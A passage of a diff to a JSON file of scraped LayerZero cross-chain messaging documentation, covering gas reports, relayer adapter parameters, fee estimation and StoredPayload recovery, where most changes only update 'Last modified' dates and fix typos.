Transactions: 3 arbiscan link: https://arbiscan.io/block/6196951 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 59129 79875 72960 3 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0x0def97133f0006e041209c721e998ad499121f9e8bd455533cdda69b5965b8fe Transactions: 11 arbiscan link: https://arbiscan.io/block/6196815 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 81024 171918 99101 11 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Block hash: 0xf119aefaccea7323a8faafd76706b22fd612b23a68a56a2a6ecc2fe5df27c9dc Transactions: 5 arbiscan link: https://arbiscan.io/block/6196814 -------------------------------- | --------------------------- | ------------- | ----------------------------- | Solc version: 0.7 .6 Optimizer enabled: true Runs: 200 Block limit: 10000000 gas | | | | Methods | | | | | | | Contract Method Min Max Avg # calls usd (avg) | | | | | | | ProverMock verifyReceipt 125488 173074 152762 5 - | | | | | | | Deployments % of limit | | | | | | ProverMock - - 1052934 10.5 % - -------------------------------- | ------------- | ------------- | ------------- | --------------- | ------------- Optimism N/A Fantom N/A Previous LayerZero Relayer Next - Ecosystem Oracle Last modified 4mo ago", "labels": [ "Documentation" ] @@ -1474,7 +1474,7 @@ { "title": "Overview", "html_url": "https://layerzero.gitbook.io/docs/ecosystem/relayer/overview", - "body": "Overview Scope of Work Relay proof across chains, and pay the cost for lzReceive execution. Gas Composition The receiving side smart contract overhead + proof cost + lzReceive. Plus, the gas varies from chain to chain. lzReceive we will have a default configuration per chain: Text Overhead Max Proof Cost (Estimate) default lzReceive Ethereum 240303 Avalanche 265574 BSC 283471 Polygon 341630 Arbitrum 173074 Optimism N/A Fantom Need Valid RPC Market Risk Charging native token A at the source chain, but paying native token B at the destination chain. The business itself is long A / short B, can hedge the market risk with short A / long B in exchanges, or balance the book timely. Ecosystem - Previous Relayer Next Develop a Relayer Last modified 15d ago", + "body": "Overview Scope of Work Relay proof across chains, and pay the cost for lzReceive execution. Gas Composition The receiving side smart contract overhead + proof cost + lzReceive. Plus, the gas varies from chain to chain. lzReceive we will have a default configuration per chain: Text Overhead Max Proof Cost (Estimate) default lzReceive Ethereum 240303 Avalanche 265574 BSC 283471 Polygon 341630 Arbitrum 173074 Optimism N/A Fantom Need Valid RPC Market Risk Charging native token A at the source chain, but paying native token B at the destination chain. The business itself is long A / short B, can hedge the market risk with short A / long B in exchanges, or balance the book timely. Ecosystem - Previous Relayer Next Develop a Relayer Last modified 1mo ago", "labels": [ "Documentation" ] @@ -1482,7 +1482,7 @@ { "title": "Development Staging", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/advanced/development-staging", - "body": "Development Staging Local Use Endpoint Mock Use the endpoint mock to locally test your app logic fully. The mock gives you an abstraction of LayerZero messaging behavior and allows you to focus on your domain logic. Portable Configuration LayerZero assumes contracts on different chains whitelist the counterparts on the other chains. An N-chain UA would need to wire N^2 paths accurately. If the app has multiple configurations for each path, e.g. token swap, it will be even harder. The problem will compound if the UA needs to add new chains (worse if with different runtimes like EVM and Solana contracts). It is very important for your configuration script unit-testable and portable to production. Testnet Smoke-Test Your Deployment After your deployment and configuration, you should do a quick smoke test to test whether message pathways are properly wired before shipping to production. Mainnet If you are doing everything right in the Testnet stage, Mainnet should just be repeating the process but with more caution. Good luck with the launch! EVM Guides - Previous Advanced Next Relayer Adapter Parameters Last modified 11mo ago", + "body": "Development Staging Local Use Endpoint Mock Use the endpoint mock to locally test your app logic fully. The mock gives you an abstraction of LayerZero messaging behavior and allows you to focus on your domain logic. Portable Configuration LayerZero assumes contracts on different chains whitelist the counterparts on the other chains. An N-chain UA would need to wire N^2 paths accurately. If the app has multiple configurations for each path, e.g. token swap, it will be even harder. The problem will compound if the UA needs to add new chains (worse if with different runtimes like EVM and Solana contracts). It is very important for your configuration script unit-testable and portable to production. Testnet Smoke-Test Your Deployment After your deployment and configuration, you should do a quick smoke test to test whether message pathways are properly wired before shipping to production. Mainnet If you are doing everything right in the Testnet stage, Mainnet should just be repeating the process but with more caution. Good luck with the launch! EVM Guides - Previous Advanced Next Relayer Adapter Parameters Last modified 1yr ago", "labels": [ "Documentation" ] @@ -1490,7 +1490,7 @@ { "title": "NonblockingLzApp", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/advanced/nonblockinglzapp", - "body": "NonblockingLzApp As mentioned in the Message Ordering section, the Endpoint will catch any unhandled error/exception from the downstream UA and block the message queue from the source contract at the source chain to all destination contracts at the destination chain, until the stored message has been retried successfully. However, UA can write a nonblocking receiver as a proxy layer to try-catch all errors/exceptions locally for future retry so that the message queue at the destination LayerZero Endpoint will never be blocked. We provide a NonblockingLzApp abstract contract as a template contract for UAs to build on. UAs simply need to inherit the class and override the _LzReceive internal function. Be sure to setTrustedRemote() to enable inbound communication on all contracts! solidity-examples/NonblockingLzApp.sol at main LayerZero-Labs/solidity-examples GitHub Previous Relayer Adapter Parameters Next - EVM Guides UA Custom Configuration Last modified 3mo ago", + "body": "NonblockingLzApp As mentioned in the Message Ordering section, the Endpoint will catch any unhandled error/exception from the downstream UA and block the message queue from the source contract at the source chain to all destination contracts at the destination chain, until the stored message has been retried successfully. However, UA can write a nonblocking receiver as a proxy layer to try-catch all errors/exceptions locally for future retry so that the message queue at the destination LayerZero Endpoint will never be blocked. We provide a NonblockingLzApp abstract contract as a template contract for UAs to build on. UAs simply need to inherit the class and override the _LzReceive internal function. Be sure to setTrustedRemote() to enable inbound communication on all contracts! solidity-examples/NonblockingLzApp.sol at main LayerZero-Labs/solidity-examples GitHub Previous Relayer Adapter Parameters Next - EVM Guides UA Custom Configuration Last modified 4mo ago", "labels": [ "Documentation" ] @@ -1498,7 +1498,7 @@ { "title": "Relayer Adapter Parameters", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/advanced/relayer-adapter-parameters", - "body": "Relayer Adapter Parameters Advanced relayer usage, and usage of _adapterParams Looking to Airdrop native gas tokens on a destination chain? Abstract: Every transaction costs a certain amount of gas. Since LayerZero delivers the destination transaction when a message is sent it must pay for that destination gas. A default of 200,000 gas is priced into the call for simplicity. As a message sender, your contract may use more or less than 200k on destination. To instruct LayerZero to use a custom amount of gas, you must pass the adapterParams argument of send() or estimateFees() Version 1 - Example: You want to call estimateFees() and get a quote for a custom gas amount. Description Type Example Value version uint16 1 value uint256 200000 Encode the adapterParams and use them in the send() or estimateFees() function call: Heres an example of how to encode the adapterParams // v1 adapterParams, encoded for version 1 style, and 200k gas quote let adapterParams = ethers . utils . solidityPack ( [ 'uint16' , 'uint256' ], [ 1 , 200000 ] ) The resulting adapterParams should look like this (34 total bytes in length): 0x00010000000000000000000000000000000000000000000000000000000000030d40 The above adapterParams can be sent to send() (or estimateFees() ) to receive a quote for a non standard amount of gas for the destination lzReceive() . If your logic on the destination chain is very simple you may ask the Relayer to pay a bit less than the default. If your message logic on the destination if very gas intense you may be required to pay more than the default of 200k gasLimit. Airdrop Version 2 - Here is an example of how to encode the adapterParams for version 2, which may modify the default 200k gas, and instructs the Relayer to send native gas into a wallet address! Description Type Example Value version uint16 2 gasAmount uint 200000 nativeForDst uint 55555555555 addressOnDst address 0x1234512345123451234512345123451234512345 // v2 adapterParams, encoded for version 2 style // which can instruct the LayerZero message to give // destination 55555555555 wei of native gas into a specific wallet let adapterParams = ethers . utils . solidityPack ( [ \"uint16\" , \"uint\" , \"uint\" , \"address\" ], [ 2 , 200000 , 55555555555 , \"0x1234512345123451234512345123451234512345\" ] ) The above adapterParams can be sent to send() or estimateFees() to receive a quote for a non standard amount of gas for the destination lzReceive() and to give an amount of destination native gas to an address! // airdrop caps out at these values, per network (values shown imply 18 decimals) // Note: these values may change occasionally. Read onchain values in Relayer.sol for accuracy. ethereum : 0.24 bsc : 1.32 avalanche : 18.47 polygon : 681 arbitrum : 0.24 optimism : 0.24 fantom : 1304 swimmer : 30000 Previous Development Staging Next NonblockingLzApp Last modified 3mo ago", + "body": "Relayer Adapter Parameters Advanced relayer usage, and usage of _adapterParams Looking to Airdrop native gas tokens on a destination chain? Abstract: Every transaction costs a certain amount of gas. Since LayerZero delivers the destination transaction when a message is sent it must pay for that destination gas. A default of 200,000 gas is priced into the call for simplicity. As a message sender, your contract may use more or less than 200k on destination. To instruct LayerZero to use a custom amount of gas, you must pass the adapterParams argument of send() or estimateFees() Version 1 - Example: You want to call estimateFees() and get a quote for a custom gas amount. Description Type Example Value version uint16 1 value uint256 200000 Encode the adapterParams and use them in the send() or estimateFees() function call: Heres an example of how to encode the adapterParams // v1 adapterParams, encoded for version 1 style, and 200k gas quote let adapterParams = ethers . utils . solidityPack ( [ 'uint16' , 'uint256' ], [ 1 , 200000 ] ) The resulting adapterParams should look like this (34 total bytes in length): 0x00010000000000000000000000000000000000000000000000000000000000030d40 The above adapterParams can be sent to send() (or estimateFees() ) to receive a quote for a non-standard amount of gas for the destination lzReceive() . If your logic on the destination chain is very simple you may ask the Relayer to pay a bit less than the default. If your message logic on the destination is very gas intense you may be required to pay more than the default of 200k gasLimit. Airdrop Version 2 - Here is an example of how to encode the adapterParams for version 2, which may modify the default 200k gas, and instruct the Relayer to send native gas into a wallet address! Description Type Example Value version uint16 2 gasAmount uint 200000 nativeForDst uint 55555555555 addressOnDst address 0x1234512345123451234512345123451234512345 // v2 adapterParams, encoded for version 2 style // which can instruct the LayerZero message to give // destination 55555555555 wei of native gas into a specific wallet let adapterParams = ethers . utils . solidityPack ( [ \"uint16\" , \"uint\" , \"uint\" , \"address\" ], [ 2 , 200000 , 55555555555 , \"0x1234512345123451234512345123451234512345\" ] ) The above adapterParams can be sent to send() or estimateFees() to receive a quote for a non-standard amount of gas for the destination lzReceive() and to give an amount of destination native gas to an address! // airdrop caps out at these values, per network (values shown imply 18 decimals) // Note: these values may change occasionally. Read onchain values in Relayer.sol for accuracy. ethereum : 0.24 bsc : 1.32 avalanche : 18.47 polygon : 681 arbitrum : 0.24 optimism : 0.24 fantom : 1304 swimmer : 30000 Previous Development Staging Next NonblockingLzApp Last modified 6d ago", "labels": [ "Documentation" ] @@ -1506,7 +1506,7 @@ { "title": "Estimating Message Fees", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/code-examples/estimating-message-fees", - "body": "Estimating Message Fees Get the quantity of native gas token to pay to send a message Call estimateFees() to return a tuple containing the cross chain message fee. There are 2 values returned as a tuple via estimateFees(). Use the 0th index to get the fee in wei to pass as value to Endpoint.send() You do not need to implement this function. This is just to show how the fee is calculated by the endpoint for the send() function. The estimateFees() function returns a dynamic fee based on Oracle and Relayer prices for the destination chainId, your UserApplication contract, and payload parameters. In solidity, you can use the ILayerZeroEndpoint.sol interface to call the view function to get the send() fees. Endpoint estimateFees() Set _payInZRO to false // Endpoint.sol estimateFees() returns the fees for the message function estimateFees ( uint16 _dstChainId , address _userApplication , bytes calldata _payload , bool _payInZRO , bytes calldata _adapterParams ) external view override returns ( uint nativeFee , uint zroFee ) { LibraryConfig storage uaConfig = uaConfigLookup [ _userApplication ]; ILayerZeroMessagingLibrary lib = uaConfig . sendVersion == DEFAULT_VERSION ? defaultSendLibrary : uaConfig . sendLibrary ; return lib . estimateFees ( _dstChainId , _userApplication , _payload , _payInZRO , _adapterParams ); } Our implementation of lib.estimateFees() illustrates how the total fee is calculated, which is the cumulative amount the oracle and relayer are collecting plus, potentially, a small protocol fee. // full estimateFees implementation function estimateFees ( uint16 _chainId , address _ua , bytes calldata _payload , bool _payInZRO , bytes calldata _adapterParams ) external view override returns ( uint nativeFee , uint zroFee ) { uint16 chainId = _chainId ; address ua = _ua ; uint payloadSize = _payload . length ; bytes memory adapterParam = _adapterParams ; ApplicationConfiguration memory uaConfig = getAppConfig ( chainId , ua ); // Relayer Fee uint relayerFee ; { if ( adapterParam . length == 0 ) { bytes memory defaultAdapterParam = defaultAdapterParams [ chainId ][ uaConfig . outboundProofType ]; relayerFee = ILayerZeroRelayer ( uaConfig . relayer ). getPrice ( chainId , uaConfig . outboundProofType , ua , payloadSize , defaultAdapterParam ); } else { relayerFee = ILayerZeroRelayer ( uaConfig . relayer ). getPrice ( chainId , uaConfig . outboundProofType , ua , payloadSize , adapterParam ); } } // Oracle Fee uint oracleFee = ILayerZeroOracle ( uaConfig . oracle ). getPrice ( chainId , uaConfig . outboundProofType ); // LayerZero Fee { uint protocolFee = treasuryContract . getFees ( _payInZRO , relayerFee , oracleFee ); _payInZRO ? zroFee = protocolFee : nativeFee = protocolFee ; } // return the sum of fees nativeFee = nativeFee . add ( relayerFee ). add ( oracleFee ); } Offchain Fee Estimation Example const fees = await endpoint . estimateFees ( dstChainId , // the destination LayerZero chainId uaContractAddress , // your contract address that calls Endpoint.send() \"0x\" , // empty payload false , // _payInZRO \"0x\" // default '0x' adapterParams, see: Relayer Adapter Param docs ) console . log ( ` fees[0] is the message fee in wei: ${ fees [ 0 ] } ` ) Check out adapterParams to customize the gas amount or airdrop native ETH! AdapterParams shows how to pack some additional settings to be used by estimateFees() and send() - it instructs LayerZero to use more gas which may be necessary to not run into a StoredPayload . Previous LZEndpointMock.sol Next PingPong.sol Last modified 3mo ago", + "body": "Estimating Message Fees Get the quantity of native gas token to pay to send a message Call estimateFees() to return a tuple containing the cross chain message fee. There are 2 values returned as a tuple via estimateFees(). Use the 0th index to get the fee in wei to pass as value to Endpoint.send() You do not need to implement this function. This is just to show how the fee is calculated by the endpoint for the send() function. The estimateFees() function returns a dynamic fee based on Oracle and Relayer prices for the destination chainId, your UserApplication contract, and payload parameters. In solidity, you can use the ILayerZeroEndpoint.sol interface to call the view function to get the send() fees. Endpoint estimateFees() Set _payInZRO to false // Endpoint.sol estimateFees() returns the fees for the message function estimateFees ( uint16 _dstChainId , address _userApplication , bytes calldata _payload , bool _payInZRO , bytes calldata _adapterParams ) external view override returns ( uint nativeFee , uint zroFee ) { LibraryConfig storage uaConfig = uaConfigLookup [ _userApplication ]; ILayerZeroMessagingLibrary lib = uaConfig . sendVersion == DEFAULT_VERSION ? defaultSendLibrary : uaConfig . sendLibrary ; return lib . estimateFees ( _dstChainId , _userApplication , _payload , _payInZRO , _adapterParams ); } Our implementation of lib.estimateFees() illustrates how the total fee is calculated, which is the cumulative amount the oracle and relayer are collecting plus, potentially, a small protocol fee. // full estimateFees implementation function estimateFees ( uint16 _chainId , address _ua , bytes calldata _payload , bool _payInZRO , bytes calldata _adapterParams ) external view override returns ( uint nativeFee , uint zroFee ) { uint16 chainId = _chainId ; address ua = _ua ; uint payloadSize = _payload . length ; bytes memory adapterParam = _adapterParams ; ApplicationConfiguration memory uaConfig = getAppConfig ( chainId , ua ); // Relayer Fee uint relayerFee ; { if ( adapterParam . length == 0 ) { bytes memory defaultAdapterParam = defaultAdapterParams [ chainId ][ uaConfig . outboundProofType ]; relayerFee = ILayerZeroRelayer ( uaConfig . relayer ). getPrice ( chainId , uaConfig . outboundProofType , ua , payloadSize , defaultAdapterParam ); } else { relayerFee = ILayerZeroRelayer ( uaConfig . relayer ). getPrice ( chainId , uaConfig . outboundProofType , ua , payloadSize , adapterParam ); } } // Oracle Fee uint oracleFee = ILayerZeroOracle ( uaConfig . oracle ). getPrice ( chainId , uaConfig . outboundProofType ); // LayerZero Fee { uint protocolFee = treasuryContract . getFees ( _payInZRO , relayerFee , oracleFee ); _payInZRO ? zroFee = protocolFee : nativeFee = protocolFee ; } // return the sum of fees nativeFee = nativeFee . add ( relayerFee ). add ( oracleFee ); } Offchain Fee Estimation Example const fees = await endpoint . estimateFees ( dstChainId , // the destination LayerZero chainId uaContractAddress , // your contract address that calls Endpoint.send() \"0x\" , // empty payload false , // _payInZRO \"0x\" // default '0x' adapterParams, see: Relayer Adapter Param docs ) console . log ( ` fees[0] is the message fee in wei: ${ fees [ 0 ] } ` ) Check out adapterParams to customize the gas amount or airdrop native ETH! AdapterParams shows how to pack some additional settings to be used by estimateFees() and send() - it instructs LayerZero to use more gas which may be necessary to not run into a StoredPayload . Previous LZEndpointMock.sol Next PingPong.sol Last modified 4mo ago", "labels": [ "Documentation" ] @@ -1514,7 +1514,7 @@ { "title": "LZEndpointMock.sol", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/code-examples/lzendpointmock.sol", - "body": "LZEndpointMock.sol A mock LayerZero endpoint contract for local testing. To enable testing locally we provide a mock that emulates a real endpoint. It has a send() method just like a real endpoint on main/test networks and it forwards the payload straight to the lzReceive() function (so you dont need a production oracle or relayer -- allowing you to test the contract logic easily). This contract helps the LayerZero team with our own testing! solidity-examples/LZEndpointMock.sol at main LayerZero-Labs/solidity-examples GitHub Previous OmniCounter.sol Next Estimating Message Fees Last modified 1yr ago", + "body": "LZEndpointMock.sol A mock LayerZero endpoint contract for local testing. To enable testing locally we provide a mock that emulates a real endpoint. It has a send() method just like a real endpoint on main/test networks and it forwards the payload straight to the lzReceive() function (so you dont need a production oracle or relayer -- allowing you to test the contract logic easily). This contract helps the LayerZero team with our own testing! https://github.com/LayerZero-Labs/solidity-examples/blob/main/contracts/lzApp/mocks/LZEndpointMock.sol Previous OmniCounter.sol Next Estimating Message Fees Last modified 21d ago", "labels": [ "Documentation" ] @@ -1530,7 +1530,7 @@ { "title": "PingPong.sol", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/code-examples/pingpong.sol", - "body": "PingPong.sol Demonstrate an onchain call to estimateFees() and a \"recursive\" call within lzReceive() This example contract demonstrates: estimateFees() : how to get the message fee on chain call send() within lzReceive() using a contract to pay the message fee (as opposed to the msg.sender) Warning: This contract will continuously send calls between two chains until one of them runs out of gas! solidity-examples/PingPong.sol at main LayerZero-Labs/solidity-examples GitHub PingPong.sol Previous Estimating Message Fees Next - EVM Guides Interfaces Last modified 3mo ago", + "body": "PingPong.sol Demonstrate an onchain call to estimateFees() and a \"recursive\" call within lzReceive() This example contract demonstrates: estimateFees() : how to get the message fee on chain call send() within lzReceive() using a contract to pay the message fee (as opposed to the msg.sender) Warning: This contract will continuously send calls between two chains until one of them runs out of gas! solidity-examples/PingPong.sol at main LayerZero-Labs/solidity-examples GitHub PingPong.sol Previous Estimating Message Fees Next - EVM Guides Error Messages Last modified 21d ago", "labels": [ "Documentation" ] @@ -1538,7 +1538,7 @@ { "title": "Common Errors and Handling", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/error-messages/error-layerzero-relayer-fee-failed", - "body": "Common Errors and Handling The most common error is not sending the gas fee when calling send(..., {value: fee}) Are you getting this error when sending a message ? LayerZero: not enough native for fees When sending a message via the endpoint send() you must pass a value so LayerZero is compensated for the extra gas required to deliver the transaction to the destination chain. This msg.value refers to the parameter of the transaction that sends the native gas token. The parameters for estimateFees() and send() MUST be the same Rule of Thumb: if you have an estimateFee value that works, try to send a transaction with (value - 1). it should revert. You can get a quote for any LayerZero message. Previous Fix a StoredPayload Next Failure Revert Messages Last modified 3mo ago", + "body": "Common Errors and Handling The most common error is not sending the gas fee when calling send(..., {value: fee}) Are you getting this error when sending a message ? LayerZero: not enough native for fees When sending a message via the endpoint send() you must pass a value so LayerZero is compensated for the extra gas required to deliver the transaction to the destination chain. This msg.value refers to the parameter of the transaction that sends the native gas token. The parameters for estimateFees() and send() MUST be the same Rule of Thumb: if you have an estimateFee value that works, try to send a transaction with (value - 1). it should revert. You can get a quote for any LayerZero message. Previous Fix a StoredPayload Next Failure Revert Messages Last modified 4mo ago", "labels": [ "Documentation" ] @@ -1554,7 +1554,7 @@ { "title": "Fix a StoredPayload", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/error-messages/fix-a-storedpayload", - "body": "Fix a StoredPayload Manually fix a StoredPayload by sending a transaction on the destination chain. A StoredPayload contains the data for a message that ran out of gas (most likely) In order to deliver this message, once its stored, you must call a transaction on the Endpoint.sol called retryPayload Youll need 3 things: source Chain ID of the chain the message was sent from source UserApplication address UA payload If we refer back to here , we know how to get these 3 items. Or use a block explorer and find the destination trasaction, and look in the Logs tab. The Logs tab of most block explorers shows the StoredPayload event values. You will need the srcChainId, srcAddress, and payload Now we simply need an instance of the Endpoint contract on the destination chain. And to call the transaction, to \"unstick\" the StoredPayload. Heres a code snippet: // some ethers.js code to show how to deliver a StoredPayload let endpoint = await ethers . getContract ( \"Endpoint\" ) let srcChainId = 9 // trustedRemote is the remote + local format let trustedRemote = hre . ethers . utils . solidityPack ( [ 'address' , 'address' ], [ remoteContract . address , localContract . address ] ) let payload = \"0x000000...0000000000\" // copy and paste entire payload here let tx = await endpoint . retryPayload ( srcChainId , trustedRemote , payload ) Thats it! If your transaction succeeds, the StoredPayload should be cleared and messages will resume if you send another message across the pathway. If you get an error about invalid payload, you may have copied it wrong. Be sure to prefix the srcAddress and the payload with 0x so that ethers.js is happy. Previous StoredPayload Detection Next Common Errors and Handling Last modified 3mo ago", + "body": "Fix a StoredPayload Manually fix a StoredPayload by sending a transaction on the destination chain. A StoredPayload contains the data for a message that ran out of gas (most likely) In order to deliver this message, once its stored, you must call a transaction on the Endpoint.sol called retryPayload Youll need 3 things: source Chain ID of the chain the message was sent from source UserApplication address UA payload If we refer back to here , we know how to get these 3 items. Or use a block explorer and find the destination trasaction, and look in the Logs tab. The Logs tab of most block explorers shows the StoredPayload event values. You will need the srcChainId, srcAddress, and payload Now we simply need an instance of the Endpoint contract on the destination chain. And to call the transaction, to \"unstick\" the StoredPayload. Heres a code snippet: // some ethers.js code to show how to deliver a StoredPayload let endpoint = await ethers . getContract ( \"Endpoint\" ) let srcChainId = 9 // trustedRemote is the remote + local format let trustedRemote = hre . ethers . utils . solidityPack ( [ 'address' , 'address' ], [ remoteContract . address , localContract . address ] ) let payload = \"0x000000...0000000000\" // copy and paste entire payload here let tx = await endpoint . retryPayload ( srcChainId , trustedRemote , payload ) Thats it! If your transaction succeeds, the StoredPayload should be cleared and messages will resume if you send another message across the pathway. If you get an error about invalid payload, you may have copied it wrong. Be sure to prefix the srcAddress and the payload with 0x so that ethers.js is happy. Previous StoredPayload Detection Next Common Errors and Handling Last modified 4mo ago", "labels": [ "Documentation" ] @@ -1562,7 +1562,7 @@ { "title": "StoredPayload", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/error-messages/storedpayload", - "body": "StoredPayload If a message arrives at the destination and reverts or runs out of gas during execution it is saved on the destination side. Anyone can go to the destination chain and pay for the transaction to be retried, however if there is a logical error it may need to be force ejected. StoredPayloads will block the nonce-ordered flow of messages. You can check for a StoredPayload using the Endpoint.sol's hasStoredPayload function, supplying the source chainId and source User Application address (which is in the TrustedRemote 40byte format). Check for StoredPayload // Endpoint.sol check for StoredPayload function hasStoredPayload ( uint16 _srcChainId , bytes calldata _srcAddress ) external view override returns ( bool ) { StoredPayload storage sp = storedPayload [ _srcChainId ][ _srcAddress ]; return sp . payloadHash != bytes32 ( 0 ); } To clear a StoredPayload, call retryPayload on the message that was stored, on the destination chain. You should call this function on the Endpoint . // Endpoint.sol function retryPayload ( uint16 _srcChainId , bytes calldata _srcAddress , bytes calldata _payload ) external override receiveNonReentrant { ... } Note: most block explorers will show the payload parameter in the Logs tab, which could make it easy to find in the case you need to call retryPayload to unblock the queue. Also, you may implement your UA as the NonblockingLzApp which is an option offered that allows messages to flow regardless of error (which will all be stored on the destination to be dealt with anytime) Force eject the StoredPayload, unblocking the queue by DESTROYING (see: be very careful) the transaction forever. This is a very powerful function, and only the User Application onlyOwner can perform it. // Endpoint.sol function forceResumeReceive ( uint16 _srcChainId , bytes calldata _srcAddress ) external override onlyOwner { Fix a Stored Payload Go here for information on fixing a StoredPayload EVM Guides - Previous Error Messages Next StoredPayload Detection Last modified 2mo ago", + "body": "StoredPayload If a message arrives at the destination and reverts or runs out of gas during execution it is saved on the destination side. Anyone can go to the destination chain and pay for the transaction to be retried, however if there is a logical error it may need to be force ejected. StoredPayloads will block the nonce-ordered flow of messages. You can check for a StoredPayload using the Endpoint.sol's hasStoredPayload function, supplying the source chainId and source User Application address (which is in the TrustedRemote 40byte format). Check for StoredPayload // Endpoint.sol check for StoredPayload function hasStoredPayload ( uint16 _srcChainId , bytes calldata _srcAddress ) external view override returns ( bool ) { StoredPayload storage sp = storedPayload [ _srcChainId ][ _srcAddress ]; return sp . payloadHash != bytes32 ( 0 ); } To clear a StoredPayload, call retryPayload on the message that was stored, on the destination chain. You should call this function on the Endpoint . // Endpoint.sol function retryPayload ( uint16 _srcChainId , bytes calldata _srcAddress , bytes calldata _payload ) external override receiveNonReentrant { ... } Note: most block explorers will show the payload parameter in the Logs tab, which could make it easy to find in the case you need to call retryPayload to unblock the queue. Also, you may implement your UA as the NonblockingLzApp which is an option offered that allows messages to flow regardless of error (which will all be stored on the destination to be dealt with anytime) Force eject the StoredPayload, unblocking the queue by DESTROYING (see: be very careful) the transaction forever. This is a very powerful function, and only the User Application onlyOwner can perform it. // Endpoint.sol function forceResumeReceive ( uint16 _srcChainId , bytes calldata _srcAddress ) external override onlyOwner { Fix a Stored Payload Go here for information on fixing a StoredPayload EVM Guides - Previous Error Messages Next StoredPayload Detection Last modified 3mo ago", "labels": [ "Documentation" ] @@ -1570,15 +1570,7 @@ { "title": "StoredPayload Detection", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/error-messages/storedpayload-detection", - "body": "StoredPayload Detection Find the hidden reason for a StoredPayload What does a StoredPayload look like on chain & How to deal with it If you see a transaction like this, then you may have a StoredPayload: https://optimistic.etherscan.io/tx/0xd3229bfe9bb64425eef6457e1198e7c2d96c3abc1721e2b0846459a291d1ff60 optimistic.etherscan.io Example StoredPayload Tx See the orange text? Although the transaction may say it succeeded, LayerZero may have a StoredPayload blocking the queue of message until dealt with. Go to the \"Logs\" tab to see the reason If there is no reason string, it could be out of gas. If there is a reason copy the bytes into a hex-to-string converter to see the reason (example below): LzReceiver: invalid source sending contract OK! Thats some helpful information - Although we ran into a StoredPayload, we now know the reason: LzReceiver: invalid source sending contract The error reminds us that we must setTrustedRemote first on the destination to allow inbound communication from the source sending User Application contract. Previous StoredPayload Next Fix a StoredPayload Last modified 3mo ago", - "labels": [ - "Documentation" - ] - }, - { - "title": "EVM (Solidity) Interfaces", - "html_url": "https://layerzero.gitbook.io/docs/evm-guides/interfaces/evm-solidity-interfaces", - "body": "EVM (Solidity) Interfaces User Application ILayerZeroEndpoint.sol ILayerZeroReceiver.sol ILayerZeroUserApplicationConfig.sol ILayerZeroEndpointLibrary.sol ILayerZeroLibraryReceiver.sol Oracle ILayerZeroOracle.sol Relayer ILayerZeroRelayer.sol These interfaces can be found in the LayerZero GitHub : ILayerZeroValidationLibrary.sol ILayerZeroUltraLightNodeV1.sol ILayerZeroValidationLibrary.sol EVM Guides - Previous Interfaces Next ILayerZeroReceiver Last modified 3mo ago", + "body": "StoredPayload Detection Find the hidden reason for a StoredPayload What does a StoredPayload look like on chain & How to deal with it If you see a transaction like this, then you may have a StoredPayload: https://optimistic.etherscan.io/tx/0xd3229bfe9bb64425eef6457e1198e7c2d96c3abc1721e2b0846459a291d1ff60 optimistic.etherscan.io Example StoredPayload Tx See the orange text? Although the transaction may say it succeeded, LayerZero may have a StoredPayload blocking the queue of message until dealt with. Go to the \"Logs\" tab to see the reason If there is no reason string, it could be out of gas. If there is a reason copy the bytes into a hex-to-string converter to see the reason (example below): LzReceiver: invalid source sending contract OK! Thats some helpful information - Although we ran into a StoredPayload, we now know the reason: LzReceiver: invalid source sending contract The error reminds us that we must setTrustedRemote first on the destination to allow inbound communication from the source sending User Application contract. Previous StoredPayload Next Fix a StoredPayload Last modified 4mo ago", "labels": [ "Documentation" ] @@ -1586,7 +1578,7 @@ { "title": "OFT", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/layerzero-omnichain-contracts/oft", - "body": "OFT Omnichain Fungible Token Here are the articles in this section: IERC165 OFT Interface Ids OFT (V1) vs OFTV2 - Which should I use? OFT (V1) OFTV2 EVM Guides - Previous LayerZero Omnichain Contracts Next IERC165 OFT Interface Ids Last modified 7mo ago", + "body": "OFT Omnichain Fungible Token Here are the articles in this section: IERC165 OFT Interface Ids OFT (V1) vs OFTV2 - Which should I use? OFT (V1) OFTV2 EVM Guides - Previous LayerZero Omnichain Contracts Next IERC165 OFT Interface Ids Last modified 6d ago", "labels": [ "Documentation" ] @@ -1594,7 +1586,7 @@ { "title": "ONFT", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/layerzero-omnichain-contracts/onft", - "body": "ONFT Omnichain NonFungible Token Here are the articles in this section: 721 1155 Previous OFTV2 Next 721 Last modified 7mo ago", + "body": "ONFT Omnichain NonFungible Token Here are the articles in this section: 721 1155 Previous OFTV2 Next 721 Last modified 20d ago", "labels": [ "Documentation" ] @@ -1602,7 +1594,7 @@ { "title": "UA Configuration", "html_url": "https://layerzero.gitbook.io/docs/evm-guides/layerzero-tooling/ua-configuration", - "body": "UA Configuration Describes the available config options in the appConfig.json Tasks The package adds the following tasks: getDefaultConfig returns the default configuration for the specified chains. Usage: npx hardhat getDefaultConfig --networks ethereum,bsc,polygon,avalanche getConfig returns the configuration of the specified contract. Parameters: address - the contract address. An optional parameter. Either contract name or contract address must be specified. name - the contract name. An optional parameter. It must be specified only if the contract was deployed using hardhat-deploy and the deployments information is located in the deployments folder. network - the network the contract is deployed to. remote-networks - a comma separated list of remote networks the contract is configured with. Usage: npx hardhat getConfig --network ethereum --remote-networks 